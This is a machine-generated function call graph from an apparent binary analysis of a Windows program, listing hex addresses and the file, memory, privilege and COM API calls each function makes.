                                                                                                                                                                                                                                execution_graph 26473 1de8fc 26474 1de91f 26473->26474 26475 1de95b 26473->26475 26474->26475 26477 1dce1c 26474->26477 26485 1dce3c 26477->26485 26478 1dcfdc 26480 1dd020 GetLastError 26478->26480 26481 1dce69 26478->26481 26479 1dcf96 26479->26481 26482 1dcfa2 memmove 26479->26482 26480->26481 26481->26474 26482->26481 26483 1dcf63 26483->26478 26488 1d8a60 2 API calls 26483->26488 26485->26478 26485->26479 26485->26481 26485->26483 26486 1dcf1e 26485->26486 26489 1dcf85 GetLastError 26485->26489 26493 1d8af4 ReadFile 26485->26493 26494 1d8a60 26485->26494 26486->26485 26492 1dd019 26486->26492 26499 21d480 VirtualAlloc 26486->26499 26491 1dcf81 26488->26491 26489->26481 26491->26478 26491->26489 26492->26481 26493->26485 26495 1d8a70 26494->26495 26496 1d8a83 SetFilePointer 26494->26496 26495->26496 26497 1d8ab0 26496->26497 26498 1d8aa6 GetLastError 26496->26498 26497->26485 26498->26497 26499->26486 26500 1df71c 26535 1d1610 26500->26535 26503 1df774 _isatty _isatty _isatty 26510 1df7c4 26503->26510 26505 1df762 _CxxThrowException 26505->26503 26506 1df89f 26550 1dac74 GetCurrentProcess OpenProcessToken 26506->26550 26509 1dac74 6 API calls 26511 1df936 26509->26511 26510->26506 26557 1f02a0 6 API calls 26510->26557 26513 1df9dd 26511->26513 26515 1df95e 26511->26515 26516 1df965 wcscmp 26511->26516 26517 1dfa94 26513->26517 26561 1d2bc8 26513->26561 26514 1df8d4 _CxxThrowException 26514->26506 26559 1dad0c GetModuleHandleW GetProcAddress 26515->26559 26516->26515 26518 1df979 26516->26518 26518->26515 26523 1df98e 26518->26523 26521 1df9c0 26521->26513 26560 21d4c0 GetModuleHandleW GetProcAddress 26521->26560 26558 1f02a0 6 API calls 26523->26558 26527 1df9a2 _CxxThrowException 26527->26515 26528 1df9c9 26530 1dac74 6 API calls 26528->26530 26533 1df9d7 26530->26533 26531 1dfa18 26534 1dfa75 GetCurrentProcess SetProcessAffinityMask free 26531->26534 26565 1f02a0 6 API calls 26531->26565 26532 1dfa63 _CxxThrowException 26532->26534 26533->26513 26534->26517 26536 1d1667 26535->26536 26537 1d1693 26535->26537 26536->26537 26539 1d167f free free 26536->26539 26538 1d16c9 26537->26538 26541 1d16c1 free 26537->26541 26566 1d2130 malloc 26538->26566 26539->26536 26541->26538 26542 1d17bd 26542->26503 26556 1f02a0 6 API calls 26542->26556 26543 1d2130 2 API calls 26544 1d16e1 26543->26544 26544->26542 26544->26543 26548 1d17bf 26544->26548 26569 1d1364 8 API calls 26544->26569 26570 1d3314 26544->26570 26573 1db8f0 26544->26573 26580 1d3404 26548->26580 26551 1dac9f LookupPrivilegeValueW 26550->26551 26552 1dad00 26550->26552 26553 1dacf5 CloseHandle 26551->26553 26554 1dacb3 AdjustTokenPrivileges 26551->26554 26552->26509 26553->26552 26554->26553 26555 1dacea GetLastError 26554->26555 26555->26553 26556->26505 26557->26514 26558->26527 26559->26521 26560->26528 26562 1d2130 2 API calls 26561->26562 26563 1d2be2 26562->26563 26564 1d2d34 malloc _CxxThrowException free 26563->26564 26564->26531 26565->26532 26567 1d213f _CxxThrowException 26566->26567 26568 1d2155 26566->26568 26567->26568 26568->26544 26569->26544 26586 1d2fbc 26570->26586 26574 1db945 26573->26574 26575 1db907 26573->26575 26574->26544 26576 1d2130 2 API calls 26575->26576 26577 1db91b 26576->26577 26578 1db924 memmove 26577->26578 26579 1db937 free 26577->26579 26578->26579 26579->26574 26581 1d3451 26580->26581 26583 1d3418 26580->26583 26581->26542 26582 1d343c memmove 26582->26581 26583->26582 26584 1d2130 2 API calls 26583->26584 26585 1d342b free 26584->26585 26585->26582 26587 1d2130 2 API calls 26586->26587 26588 1d2fda memmove 26587->26588 26588->26544 26589 1ff13e 26591 1ff144 26589->26591 26634 1d450c 26591->26634 26594 1ff1d6 26595 1ff206 26594->26595 26658 1d339c 26594->26658 26597 1d2130 2 API calls 26595->26597 26598 1ff248 26595->26598 26597->26598 26641 21c7d4 26598->26641 26601 1ffacb 26603 1d2130 2 API calls 26601->26603 26627 1ffaf9 26601->26627 26603->26627 26604 200028 free free free free 26607 202d6b free 26604->26607 26605 1ffa6e free free free 26605->26607 26606 1ffa90 26633 1dc90c 3 API calls 26606->26633 26610 203702 26607->26610 26609 1ffaa2 26609->26601 26611 1ffaa9 free free free 26609->26611 26611->26607 26613 200034 free free free free 26613->26607 26614 20005f free free free free 26614->26607 26615 20008a free free free free 26615->26607 26617 2000c9 free free free free 26617->26607 26620 20010e free free free free 26620->26607 26622 200192 free free free free 26622->26607 26624 2001d4 free free free free 26624->26607 26625 1d3404 malloc _CxxThrowException free memmove 26625->26627 26627->26604 26627->26613 26627->26614 26627->26615 26627->26617 26627->26620 26627->26622 26627->26624 26627->26625 26628 200213 free free free free 26627->26628 26630 20014d free free free free 26627->26630 26654 1fe0e8 26627->26654 26663 1fb58c 6 API calls 26627->26663 26628->26607 26630->26607 26633->26609 26635 1d4529 26634->26635 26664 1d3274 26635->26664 26637 1d453c 26638 1d3208 26637->26638 26639 1d2130 2 API calls 26638->26639 26640 1d3222 26639->26640 26640->26594 26642 1ff2c8 26641->26642 26643 21c7ea 26641->26643 26642->26601 26648 1dc90c 26642->26648 26644 1d2130 2 API calls 26643->26644 26645 21c7fe 26644->26645 26646 21c807 memmove 26645->26646 26647 21c81a free 26645->26647 26646->26647 26647->26642 26649 1dc920 26648->26649 26651 1dc932 26648->26651 26650 1d8a60 2 API calls 26649->26650 26649->26651 26652 1dc97c 26650->26652 26651->26605 26651->26606 26652->26651 26653 1dc995 GetLastError 26652->26653 26653->26651 26657 1fe110 26654->26657 26655 1fe120 26655->26627 26657->26655 26668 205988 22 API calls 26657->26668 26659 1d33b2 26658->26659 26660 1d33e2 memmove 26659->26660 26661 1d2130 2 API calls 26659->26661 26660->26595 26662 1d33d1 free 26661->26662 26662->26660 26663->26627 26665 1d3289 26664->26665 26666 1d2fbc 2 API calls 26665->26666 26667 1d329f memmove 26666->26667 26667->26637 26668->26655 26669 203a42 26670 203c87 26669->26670 26671 203a4e 26669->26671 26671->26670 26707 1fb2a0 VariantClear 26671->26707 26673 203ab7 26673->26670 26708 1fb2a0 VariantClear 26673->26708 26675 203ad4 26675->26670 26709 1fb2a0 VariantClear 26675->26709 26677 203af1 26677->26670 26710 1fb2a0 VariantClear 26677->26710 26679 203b0e 26679->26670 26711 1fb2a0 VariantClear 26679->26711 26681 203b2b 26681->26670 26712 1fb2a0 VariantClear 26681->26712 26683 203b48 26683->26670 26684 1d450c 3 API calls 26683->26684 26685 203b62 26684->26685 26686 1d3208 2 API calls 26685->26686 26687 203b6d 26686->26687 26688 203b97 26687->26688 26689 1d339c 4 API calls 26687->26689 26690 203c72 free free 26688->26690 26691 203c29 26688->26691 26692 203bcd 26688->26692 26689->26688 26690->26670 26714 1f9190 CharUpperW CharUpperW 26691->26714 26694 1d3208 2 API calls 26692->26694 26696 203bd7 26694->26696 26695 203c36 26715 1f005c 10 API calls 26695->26715 26698 1d3208 2 API calls 26696->26698 26700 203be4 26698->26700 26699 203c5a 26702 1d3404 4 API calls 26699->26702 26713 1f005c 10 API calls 26700->26713 26704 203c66 free 26702->26704 26703 203bfa 26705 1d3404 4 API calls 26703->26705 26704->26690 26706 203c06 free free free 26705->26706 26706->26690 26707->26673 26708->26675 26709->26677 26710->26679 26711->26681 26712->26683 26713->26703 26714->26695 26715->26699 26716 2042a2 26717 2042b8 26716->26717 26806 1f40c4 26717->26806 26720 1d3404 4 API calls 26721 204370 26720->26721 26722 2043b1 26721->26722 26723 2045d8 26721->26723 26725 2046c5 free free 26722->26725 26726 2043b9 26722->26726 26724 1d3404 4 API calls 26723->26724 26728 20463b 26724->26728 26729 1f419c 7 API calls 26725->26729 26809 1fc684 26726->26809 26731 1d3404 4 API calls 26728->26731 26745 204519 26729->26745 26734 20464c 26731->26734 26732 204728 free free 26736 1f419c 7 API calls 26732->26736 26733 2043dd 26735 1d2130 2 API calls 26733->26735 26737 1d3404 4 API calls 26734->26737 26738 2043e7 26735->26738 26736->26745 26739 20465d free free 26737->26739 26741 204401 26738->26741 26816 1fcaac malloc _CxxThrowException memmove 26738->26816 26740 1f419c 7 API calls 26739->26740 26740->26745 26743 1db8f0 4 API calls 26741->26743 26744 204411 free free 26743->26744 26813 1f419c 7 API calls 26744->26813 26749 204030 26750 204054 memmove 26749->26750 26751 204035 memmove 26749->26751 26750->26745 26752 204078 memmove 26750->26752 26751->26752 26753 204098 26752->26753 26779 1fc0fc 26753->26779 26756 1d3404 4 API calls 26757 2040c2 26756->26757 26758 1d3404 4 API calls 26757->26758 26759 2040d3 26758->26759 26794 203d58 26759->26794 26761 2040ee 26762 2040f8 26761->26762 26763 20447d 26761->26763 26765 1d2130 2 API calls 26762->26765 26764 20450b 26763->26764 26767 1d3404 4 API calls 26763->26767 26766 1f419c 7 API calls 26764->26766 26768 204102 26765->26768 26766->26745 26770 2044e9 26767->26770 26769 20411c 26768->26769 26815 1fcaac malloc _CxxThrowException memmove 26768->26815 26773 1db8f0 4 API calls 26769->26773 26772 1d3404 4 API calls 26770->26772 26774 2044fa 26772->26774 26775 20412c 26773->26775 26776 1d3404 4 API calls 26774->26776 26777 1f419c 7 API calls 26775->26777 26776->26764 26778 20413a 26777->26778 26780 1d3208 2 API calls 26779->26780 26781 1fc157 26780->26781 26782 1d3208 2 API calls 26781->26782 26783 1fc161 26782->26783 26784 1d3208 2 API calls 26783->26784 26785 1fc194 26784->26785 26786 1d3208 2 API calls 26785->26786 26787 1fc19e 26786->26787 26788 1d3208 2 API calls 26787->26788 26789 1fc1ab 26788->26789 26790 1d3208 2 API calls 26789->26790 26791 1fc1b8 26790->26791 26792 1d3208 2 API calls 26791->26792 26793 1fc1c5 26792->26793 26793->26756 26795 203dc3 26794->26795 26796 203d86 26794->26796 26798 1d2130 2 API calls 26795->26798 26805 203d8e 26795->26805 26797 1d2130 2 API calls 26796->26797 26797->26805 26799 203dd4 26798->26799 26800 1d3404 4 API calls 26799->26800 26801 203e15 26800->26801 26817 1d91dc 26801->26817 26804 203e2a GetLastError 26804->26805 26805->26761 26807 1d3208 2 API calls 26806->26807 26808 1f4140 memmove 26807->26808 26808->26720 26810 1fc6dd 26809->26810 26951 1dae2c 26810->26951 26814 1f4206 memmove 26813->26814 26814->26749 26815->26769 26816->26741 26820 1d9164 26817->26820 26825 1d8cdc 26820->26825 26822 1d918d 26837 1d8f18 12 API calls 26822->26837 26824 1d91a5 26824->26804 26824->26805 26838 1d89d8 26825->26838 26827 1d8d0d 26827->26822 26828 1d8d07 26828->26827 26829 1d8d5a 26828->26829 26830 1d8d36 CreateFileW 26828->26830 26829->26827 26831 1d3208 2 API calls 26829->26831 26830->26829 26832 1d8d6e 26831->26832 26841 1da7ec 26832->26841 26835 1d8dad free 26835->26827 26836 1d8d87 CreateFileW 26836->26835 26837->26824 26839 1d89f4 26838->26839 26840 1d89e7 CloseHandle 26838->26840 26839->26828 26840->26839 26846 1da224 26841->26846 26843 1d8d83 26843->26835 26843->26836 26845 1d339c 4 API calls 26845->26843 26847 1da257 26846->26847 26848 1da25e 26846->26848 26847->26843 26847->26845 26848->26847 26849 1da363 26848->26849 26856 1da28c 26848->26856 26850 1da44b 26849->26850 26852 1da37c 26849->26852 26851 1da618 26850->26851 26853 1da461 26850->26853 26854 1d3274 3 API calls 26851->26854 26852->26853 26858 1da389 26852->26858 26855 1d3208 2 API calls 26853->26855 26857 1da626 26854->26857 26859 1da46b 26855->26859 26856->26847 26860 1d3274 3 API calls 26856->26860 26864 1d3274 3 API calls 26857->26864 26861 1d3274 3 API calls 26858->26861 26938 1d9f80 malloc _CxxThrowException free memmove GetCurrentDirectoryW 26859->26938 26863 1da2bb 26860->26863 26865 1da396 26861->26865 26870 1da2cf free 26863->26870 26871 1da2de 26863->26871 26867 1da644 26864->26867 26873 1d3274 3 API calls 26865->26873 26866 1da476 26868 1da47a free 26866->26868 26879 1da48b 26866->26879 26944 1d9fd8 memmove 26867->26944 26868->26847 26870->26847 26874 1d3274 3 API calls 26871->26874 26872 1da64f 26876 1da66c 26872->26876 26877 1da653 free free 26872->26877 26878 1da3c2 26873->26878 26875 1da2ec 26874->26875 26932 1d9fd8 memmove 26875->26932 26945 1d3670 malloc _CxxThrowException memmove free _CxxThrowException 26876->26945 26877->26847 26936 1d9fd8 memmove 26878->26936 26886 1da4ab 26879->26886 26900 1da4c6 26879->26900 26883 1da2f7 26887 1da2fb free free 26883->26887 26888 1da317 26883->26888 26884 1da67b 26891 1d362c 6 API calls 26884->26891 26885 1da3cd 26889 1da3ed 26885->26889 26890 1da3d1 free free 26885->26890 26893 1da4cf 26886->26893 26894 1da4b7 free 26886->26894 26887->26847 26933 1d362c 26888->26933 26937 1d3670 malloc _CxxThrowException memmove free _CxxThrowException 26889->26937 26890->26847 26896 1da69d 26891->26896 26898 1d3208 2 API calls 26893->26898 26894->26847 26901 1d362c 6 API calls 26896->26901 26897 1da3fc 26907 1d362c 6 API calls 26897->26907 26902 1da538 26898->26902 26899 1da339 26903 1d362c 6 API calls 26899->26903 26900->26893 26904 1da609 free 26900->26904 26905 1da502 26900->26905 26906 1da6aa free free 26901->26906 26909 1da56b 26902->26909 26912 1da545 26902->26912 26910 1da346 free free 26903->26910 26904->26847 26905->26893 26917 1da518 free 26905->26917 26906->26847 26908 1da421 26907->26908 26911 1d362c 6 API calls 26908->26911 26913 1d339c 4 API calls 26909->26913 26910->26847 26914 1da42e free free 26911->26914 26939 1d35d8 6 API calls 26912->26939 26916 1da569 26913->26916 26914->26847 26941 1d9fd8 memmove 26916->26941 26917->26847 26918 1da55c 26940 1d35d8 6 API calls 26918->26940 26921 1da583 26922 1da587 free free 26921->26922 26923 1da5a3 26921->26923 26922->26847 26924 1da5b3 26923->26924 26942 1d3670 malloc _CxxThrowException memmove free _CxxThrowException 26923->26942 26943 1d9a80 malloc _CxxThrowException memmove 26924->26943 26927 1da5c8 26928 1d362c 6 API calls 26927->26928 26929 1da5d4 free 26928->26929 26930 1d362c 6 API calls 26929->26930 26931 1da5ec free free 26930->26931 26931->26847 26932->26883 26946 1d3004 26933->26946 26936->26885 26937->26897 26938->26866 26939->26918 26940->26916 26941->26921 26942->26924 26943->26927 26944->26872 26945->26884 26947 1d302b memmove 26946->26947 26948 1d3016 26946->26948 26947->26899 26950 1d2ef4 malloc _CxxThrowException memmove free _CxxThrowException 26948->26950 26950->26947 26952 1dae3a 26951->26952 26953 1dae36 26951->26953 26955 1dadd0 VariantClear 26952->26955 26953->26732 26953->26733 26955->26953 26956 1e251c 26958 1e255c 26956->26958 26962 1e2543 26956->26962 26964 1e23ec 26958->26964 26959 1e2691 26959->26962 26974 1fc59c 26959->26974 26961 1e25c5 26961->26959 26961->26962 26963 1e2662 SetFileSecurityW 26961->26963 26963->26959 26965 1e2408 26964->26965 26972 1e2401 26964->26972 26984 1d8bb0 SetFileTime 26965->26984 26967 1e2489 26968 1e24d2 26967->26968 26990 1d8c98 26967->26990 26985 1dcb34 26968->26985 26972->26961 26975 1fc5e9 26974->26975 26976 1fc5ef 26975->26976 26977 1fc655 26975->26977 26983 1fc5fa 26975->26983 26980 1dae2c VariantClear 26976->26980 26978 1dae2c VariantClear 26977->26978 26981 1fc61b 26978->26981 26979 1fc61f 26982 1dae2c VariantClear 26979->26982 26980->26981 26981->26962 26982->26981 26983->26976 26983->26979 26984->26967 26986 1d89d8 CloseHandle 26985->26986 26987 1dcb43 26986->26987 26988 1dcb56 26987->26988 26989 1dcb49 GetLastError 26987->26989 26988->26972 26989->26988 26991 1d8a60 2 API calls 26990->26991 26992 1d8cb3 26991->26992 26993 1d8cc0 26992->26993 26994 1d8cc4 SetEndOfFile 26992->26994 26993->26968 26995 1e211c 13 API calls 26993->26995 26994->26993 26995->26968 26996 1dc858 26997 1dc865 26996->26997 26998 1dc870 26996->26998 27000 1dcdf4 26997->27000 27005 1dc704 27000->27005 27008 21d4a0 VirtualFree 27005->27008 27007 1dc74e 27008->27007 27009 1dcb78 27014 1d8c38 27009->27014 27012 1dcbb5 27013 1dcba8 GetLastError 27013->27012 27015 1d8c54 27014->27015 27017 1d8c87 27015->27017 27018 1d8bf0 WriteFile 27015->27018 27017->27012 27017->27013 27018->27015 27019 1e4418 27020 1e4458 27019->27020 27397 1fec5c 27020->27397 27023 1e4587 27026 1e45aa 27023->27026 27027 1e4596 27023->27027 27024 1e4575 27025 1dae2c VariantClear 27024->27025 27105 1e457f 27025->27105 27028 1dae2c VariantClear 27026->27028 27029 1dae2c VariantClear 27027->27029 27030 1e45c7 27028->27030 27029->27105 27031 1e4618 27030->27031 27032 1e4606 27030->27032 27034 1e4640 27031->27034 27035 1e4620 27031->27035 27033 1dae2c VariantClear 27032->27033 27033->27105 27037 1e463e 27034->27037 27038 1e4647 27034->27038 27540 1d34c0 malloc _CxxThrowException SysStringLen free 27035->27540 27040 1dae2c VariantClear 27037->27040 27039 1dae2c VariantClear 27038->27039 27039->27105 27041 1e4665 27040->27041 27042 1e46a4 27041->27042 27043 1e4692 27041->27043 27045 1e46cc 27042->27045 27046 1e46ac 27042->27046 27044 1dae2c VariantClear 27043->27044 27044->27105 27048 1e46ca 27045->27048 27049 1e46d3 27045->27049 27541 1d34c0 malloc _CxxThrowException SysStringLen free 27046->27541 27051 1dae2c VariantClear 27048->27051 27050 1dae2c VariantClear 27049->27050 27050->27105 27054 1e46f1 27051->27054 27052 1e49c6 27431 1fb204 27052->27431 27058 1d3208 2 API calls 27054->27058 27059 1e4842 27054->27059 27054->27105 27055 1e48b8 27055->27052 27546 1d4d78 10 API calls 27055->27546 27061 1e476e 27058->27061 27059->27055 27068 1e4890 27059->27068 27544 1d3918 memmove 27059->27544 27060 1fc59c VariantClear 27072 1e4a03 27060->27072 27063 1d3208 2 API calls 27061->27063 27065 1e478a 27063->27065 27064 1e493f 27067 1e4954 27064->27067 27548 1e30dc free free memmove 27064->27548 27073 1d3208 2 API calls 27065->27073 27070 1f63cc 6 API calls 27067->27070 27068->27055 27545 1d3918 memmove 27068->27545 27076 1e4963 27070->27076 27071 1e4a45 27085 1e4a65 27071->27085 27103 1e4aad 27071->27103 27071->27105 27072->27071 27072->27105 27549 1e4210 29 API calls 27072->27549 27078 1e4798 27073->27078 27074 1e48fd 27074->27064 27074->27067 27547 1d4338 CharUpperW CharUpperW wcscmp 27074->27547 27079 1d3404 4 API calls 27076->27079 27542 1d92d4 malloc _CxxThrowException _CxxThrowException free 27078->27542 27082 1e4973 free 27079->27082 27080 1e4aa0 27086 1e4c6f 27080->27086 27087 1e4db2 27080->27087 27084 1e4992 27082->27084 27083 1e47c5 27088 1e481d free free free 27083->27088 27543 1d9444 malloc _CxxThrowException memmove memmove 27083->27543 27089 1e49c1 free 27084->27089 27095 1e49a9 free free 27084->27095 27085->27080 27550 1e30dc free free memmove 27085->27550 27096 1d2130 2 API calls 27086->27096 27107 1e4c82 27086->27107 27099 1e4e2c 27087->27099 27100 1e4de2 27087->27100 27087->27105 27088->27059 27089->27052 27090 1e4ae1 27090->27105 27552 1e30dc free free memmove 27090->27552 27094 1e47e1 27098 1d3404 4 API calls 27094->27098 27095->27084 27096->27107 27097 1f63cc 6 API calls 27111 1e4cf7 27097->27111 27101 1e47f1 free 27098->27101 27108 1e4e5d 27099->27108 27109 1e4e70 27099->27109 27102 1d2130 2 API calls 27100->27102 27101->27088 27102->27105 27103->27090 27103->27105 27551 1d4338 CharUpperW CharUpperW wcscmp 27103->27551 27104 1e4d65 free 27104->27105 27107->27097 27113 1dae2c VariantClear 27108->27113 27114 1e4e78 27109->27114 27115 1e65de 27109->27115 27111->27104 27112 1d362c 6 API calls 27111->27112 27112->27104 27113->27105 27116 1dae2c VariantClear 27114->27116 27117 1dae2c VariantClear 27115->27117 27118 1e4ea7 27116->27118 27117->27105 27435 1e1fcc 27118->27435 27121 1e1fcc VariantClear 27122 1e4f03 27121->27122 27122->27105 27123 1e1fcc VariantClear 27122->27123 27124 1e4f30 27123->27124 27124->27105 27125 1fb204 VariantClear 27124->27125 27126 1e4f5e 27125->27126 27126->27105 27128 1e4fa7 27126->27128 27553 1f6484 20 API calls 27126->27553 27129 1e50ea 27128->27129 27131 1d3314 3 API calls 27128->27131 27439 1f63cc 27129->27439 27132 1e4fc5 27131->27132 27554 1f6154 malloc _CxxThrowException free 27132->27554 27133 1e5264 27136 1d3314 3 API calls 27133->27136 27135 1e513a 27135->27133 27144 1d3208 2 API calls 27135->27144 27139 1e5276 27136->27139 27137 1e4fd0 27140 1e4fe4 27137->27140 27141 1e5032 27137->27141 27156 1e52be 27139->27156 27557 1e1b60 7 API calls 27139->27557 27142 1d2130 2 API calls 27140->27142 27158 1e5013 27141->27158 27555 1d4938 wcscmp 27141->27555 27145 1e4fee 27142->27145 27143 1e5129 free free 27143->27135 27146 1e5153 27144->27146 27149 1e5003 27145->27149 27154 1d3208 2 API calls 27145->27154 27556 1e2b54 42 API calls 27146->27556 27160 1db8f0 4 API calls 27149->27160 27151 1e5043 27151->27158 27162 1d2130 2 API calls 27151->27162 27152 1e52a5 27157 1d3404 4 API calls 27152->27157 27153 1d362c 6 API calls 27159 1e50d8 free 27153->27159 27154->27149 27155 1e5164 27161 1e525a free 27155->27161 27165 1d2130 2 API calls 27155->27165 27164 1e53ec 27156->27164 27171 1d3208 2 API calls 27156->27171 27163 1e52b3 free 27157->27163 27158->27153 27159->27129 27160->27158 27161->27133 27167 1e5052 27162->27167 27163->27156 27166 1e5400 27164->27166 27181 1e5461 27164->27181 27168 1e517b 27165->27168 27169 1d3404 4 API calls 27166->27169 27170 1e5067 27167->27170 27175 1d3208 2 API calls 27167->27175 27173 1e5194 27168->27173 27177 1d3208 2 API calls 27168->27177 27174 1e5411 27169->27174 27180 1db8f0 4 API calls 27170->27180 27187 1e52e8 free 27171->27187 27172 1e5c23 27176 1d3404 4 API calls 27172->27176 27184 1db8f0 4 API calls 27173->27184 27178 1e5427 27174->27178 27559 1d695c 39 API calls 27174->27559 27175->27170 27179 1e5c34 27176->27179 27177->27173 27178->27172 27183 1e5433 free free 27178->27183 27191 1d3208 2 API calls 27179->27191 27198 1e606d 27179->27198 27307 1e6557 free free 27179->27307 27180->27158 27181->27172 27185 1d3208 2 API calls 27181->27185 27183->27105 27214 1e51a8 27184->27214 27188 1e5488 27185->27188 27187->27164 27189 1e536b 27187->27189 27444 1d7ebc 27188->27444 27194 1d3404 4 API calls 27189->27194 27195 1e5c5b 27191->27195 27197 1e5387 27194->27197 27199 1e5c93 27195->27199 27580 1e1afc malloc _CxxThrowException memmove 27195->27580 27196 1e54a4 27201 1e54ae 27196->27201 27202 1e54f3 27196->27202 27209 1d3314 3 API calls 27197->27209 27268 1e6197 27198->27268 27198->27307 27592 1e1924 VariantClear _CxxThrowException _CxxThrowException 27198->27592 27200 1d362c 6 API calls 27199->27200 27206 1e5ca7 27200->27206 27207 1e576f 27201->27207 27208 1e54b7 free free free 27201->27208 27560 1e18f8 malloc _CxxThrowException memmove 27202->27560 27204 1d2130 2 API calls 27236 1e625a 27204->27236 27581 1e2c58 19 API calls 27206->27581 27218 1e577e 27207->27218 27219 1e5836 27207->27219 27208->27105 27217 1e53c7 27209->27217 27210 1e60c2 27220 1e60c9 free free 27210->27220 27258 1e60f8 27210->27258 27211 1e5c77 27221 1d3404 4 API calls 27211->27221 27212 1e5c16 free 27212->27172 27213 1e5b62 27213->27212 27230 1d3314 3 API calls 27213->27230 27216 1d3404 4 API calls 27214->27216 27223 1e5251 27216->27223 27558 1f6154 malloc _CxxThrowException free 27217->27558 27564 1dc54c 94 API calls 27218->27564 27227 1e583f 27219->27227 27228 1e59e4 27219->27228 27220->27105 27229 1e5c88 free 27221->27229 27222 1e5cb4 27231 1e5d18 27222->27231 27232 1e5cb9 27222->27232 27223->27161 27239 1d3314 3 API calls 27227->27239 27237 1e5a9b 27228->27237 27238 1e59f6 27228->27238 27229->27199 27273 1e5b9a 27230->27273 27242 1d3208 2 API calls 27231->27242 27582 1e2094 7 API calls 27232->27582 27233 1e5510 27561 1d318c 27233->27561 27234 1e53d2 27244 1d362c 6 API calls 27234->27244 27235 1e5788 27246 1e5826 27235->27246 27247 1e5791 27235->27247 27534 1d9220 27236->27534 27572 1d8624 27237->27572 27570 1d695c 39 API calls 27238->27570 27240 1e584e 27239->27240 27566 1dc54c 94 API calls 27240->27566 27253 1e5d22 27242->27253 27255 1e53e1 free 27244->27255 27246->27212 27565 1e2094 7 API calls 27247->27565 27250 1e5a00 27250->27212 27261 1e5a09 27250->27261 27252 1e5cd0 27263 1e5cdb free free free 27252->27263 27264 1e6060 free 27252->27264 27265 1e5d48 27253->27265 27274 1e5d32 27253->27274 27255->27164 27256 1e5aa5 27256->27212 27266 1e5aae 27256->27266 27258->27268 27281 1e619c 27258->27281 27282 1e618a 27258->27282 27260 1e62d2 27595 1e211c 13 API calls 27260->27595 27571 1e211c 13 API calls 27261->27571 27262 1e5859 27271 1e590d 27262->27271 27272 1e5862 27262->27272 27263->27105 27264->27198 27583 1da8a0 24 API calls 27265->27583 27578 1d6d48 47 API calls 27266->27578 27267 1e57a5 27279 1e57ab free free free 27267->27279 27280 1e57e7 free free free 27267->27280 27268->27204 27268->27307 27568 1d6a04 41 API calls 27271->27568 27567 1e2094 7 API calls 27272->27567 27287 1d3208 2 API calls 27273->27287 27289 1d3404 4 API calls 27274->27289 27275 1e559e 27290 1e55ed 27275->27290 27291 1e55a5 free free free free 27275->27291 27278 1e6484 27294 1e64ee 27278->27294 27320 1d3314 3 API calls 27278->27320 27279->27105 27280->27105 27593 1d6b2c 41 API calls 27281->27593 27295 1d3404 4 API calls 27282->27295 27283 1e62e6 27296 1e62ec free free 27283->27296 27297 1e632a free free 27283->27297 27285 1e5a1d 27299 1e5a5f free free free 27285->27299 27300 1e5a23 free free free 27285->27300 27302 1e5bcb 27287->27302 27304 1e5d43 27289->27304 27306 1e5765 free 27290->27306 27318 1e56b4 27290->27318 27331 1e560c 27290->27331 27332 1e5714 free free free free 27290->27332 27291->27105 27292 1e5ab8 27292->27212 27305 1e5ac1 GetLastError 27292->27305 27293 1e5d61 27293->27304 27584 1e2094 7 API calls 27293->27584 27294->27307 27334 1e6518 free free 27294->27334 27295->27268 27296->27105 27297->27105 27298 1e61aa 27309 1e61af 27298->27309 27310 1e6228 27298->27310 27299->27105 27300->27105 27301 1e5876 27311 1e587c free free free free 27301->27311 27312 1e58c3 free free free free 27301->27312 27313 1d7ebc 90 API calls 27302->27313 27303 1e591c 27315 1e59d5 free 27303->27315 27316 1e5925 27303->27316 27322 1e6055 free 27304->27322 27326 1e5e66 27304->27326 27327 1e5de2 27304->27327 27305->27212 27317 1e5ad0 27305->27317 27306->27207 27307->27105 27594 1e2204 7 API calls 27309->27594 27310->27268 27311->27105 27312->27105 27329 1e5bde 27313->27329 27315->27212 27569 1e2204 7 API calls 27316->27569 27579 1e211c 13 API calls 27317->27579 27318->27306 27333 1e64a6 27320->27333 27321 1e6368 27321->27278 27325 1d8c98 3 API calls 27321->27325 27322->27264 27324 1e5d7d 27324->27304 27336 1e5d84 free free free free 27324->27336 27337 1e63b0 27325->27337 27326->27322 27587 1d94a4 malloc _CxxThrowException free memset 27326->27587 27585 1d6b2c 41 API calls 27327->27585 27340 1e5bfd free free 27329->27340 27523 1d68a0 27329->27523 27342 1e5614 27331->27342 27343 1e56c3 free free free free 27331->27343 27332->27105 27598 1e3210 6 API calls 27333->27598 27334->27105 27335 1e5ae4 27346 1e5aea free free free 27335->27346 27347 1e5b26 free free free 27335->27347 27336->27105 27348 1e6415 27337->27348 27596 1e211c 13 API calls 27337->27596 27339 1e61c6 27350 1e61cc free free 27339->27350 27351 1e61fa free free 27339->27351 27340->27212 27341 1e593e 27353 1e598b free free free free 27341->27353 27354 1e5944 free free free free 27341->27354 27342->27318 27355 1e561c 27342->27355 27343->27105 27357 1e597b 27346->27357 27347->27357 27537 1d8adc 27348->27537 27349 1e5df1 27349->27322 27586 1e2204 7 API calls 27349->27586 27350->27357 27351->27357 27353->27357 27354->27357 27362 1e566a free free free free 27355->27362 27363 1e5620 free free free free 27355->27363 27356 1e64bf 27364 1e64e4 free 27356->27364 27370 1d3404 4 API calls 27356->27370 27357->27105 27360 1e5e92 27368 1e604a free 27360->27368 27373 1d3208 2 API calls 27360->27373 27362->27105 27363->27105 27364->27294 27365 1e63cf 27365->27348 27371 1e63d6 free free 27365->27371 27368->27322 27374 1e64e3 27370->27374 27371->27105 27372 1e5e13 27372->27322 27376 1e5e1e free free free free 27372->27376 27378 1e5eb6 27373->27378 27374->27364 27376->27357 27380 1d3208 2 API calls 27378->27380 27379 1e643e 27379->27278 27381 1e6445 free free 27379->27381 27382 1e5ec4 27380->27382 27381->27105 27588 1d92d4 malloc _CxxThrowException _CxxThrowException free 27382->27588 27385 1e5eeb 27386 1e5ef4 27385->27386 27387 1e5f83 27385->27387 27589 1e2094 7 API calls 27386->27589 27590 1d9828 130 API calls 27387->27590 27390 1e5f0a 27392 1e602f free free 27390->27392 27393 1e5f15 7 API calls 27390->27393 27391 1e5f9d 27391->27392 27591 1e211c 13 API calls 27391->27591 27392->27368 27393->27105 27395 1e5fba 27395->27392 27396 1e5fc1 7 API calls 27395->27396 27396->27105 27398 1fed02 27397->27398 27399 1fecd3 27397->27399 27400 1fb204 VariantClear 27398->27400 27399->27398 27402 1feceb free free 27399->27402 27401 1fed27 27400->27401 27403 1e4540 27401->27403 27599 1fdfa4 14 API calls 27401->27599 27402->27399 27403->27023 27403->27024 27403->27105 27405 1fed47 27405->27403 27406 1d3404 4 API calls 27405->27406 27407 1fed5b 27406->27407 